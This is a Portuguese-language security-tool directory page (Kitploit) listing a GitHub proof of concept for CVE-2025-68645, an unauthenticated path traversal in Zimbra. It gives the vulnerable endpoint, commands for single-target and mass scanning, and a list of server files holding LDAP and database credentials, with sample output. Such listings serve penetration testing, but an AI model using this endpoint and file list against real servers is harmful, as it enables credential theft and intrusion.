Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Poc_CVE-2025-68645 — Zimbra Path Traversal (CVE-2025-68645) - Vulnerabilidade não autenticada de leitura de arquivos no Zimbra Collaboration Suite | Kitploit
Ferramentas/GitHubGitHub/harisaidhin/poc_cve-2025-68645
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubharisaidhin/poc_cve-2025-68645

Poc_CVE-2025-68645

Zimbra Path Traversal (CVE-2025-68645) - Vulnerabilidade não autenticada de leitura de arquivos no Zimbra Collaboration Suite

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-68645 - Vulnerabilidade de Path Traversal no Zimbra

Security CVE Python License Status

📋 Visão Geral

CVE-2025-68645 é uma vulnerabilidade de path traversal no Zimbra Collaboration Suite que permite que atacantes não autenticados leiam arquivos arbitrários do sistema de arquivos do servidor.

Endpoint Vulnerável

/h/printconversations?javax.servlet.include.servlet_path=

🎯 Impacto

ImpactoSeveridade
Leitura de arquivo não autenticada🔴 Alta
Divulgação de configuração🔴 Alta
Vazamento de credenciais🔴 Alta
Mapeamento da rede interna🟠 Média

📁 Arquivos Legíveis

🚀 Uso

Varredura de Alvo Único

python CVE-2025-68645.py.py -t https://target.zimbra.com

Varredura em Massa

python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20

Opções Avançadas

python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30

📊 Argumentos de Linha de Comando

Argumento Descrição Padrão -t, --target URL do alvo único None -l, --list Arquivo contendo lista de alvos None -o, --output Nome do arquivo de saída results.json --threads Número de threads concorrentes 10 --timeout Timeout da requisição em segundos 15 -v, --verbose Ativar saída detalhada False --no-verify Desativar verificação SSL False --read-all Ler todos os caminhos sensíveis False

📸 Exemplo de Saída

[*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml

============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0

Baixar ferramenta
CaminhoInformação Exposta
/WEB-INF/web.xmlMapeamentos de servlets, restrições de segurança
/WEB-INF/zcs.web.xmlConfiguração específica do Zimbra
/opt/zimbra/conf/localconfig.xmlCredenciais LDAP, senhas de banco de dados
/opt/zimbra/conf/ldap-config.xmlConfiguração do servidor LDAP
/opt/zimbra/conf/attrs/zimbra-attrs.xmlAtributos do sistema
/WEB-INF/classes/logging.propertiesConfiguração de logging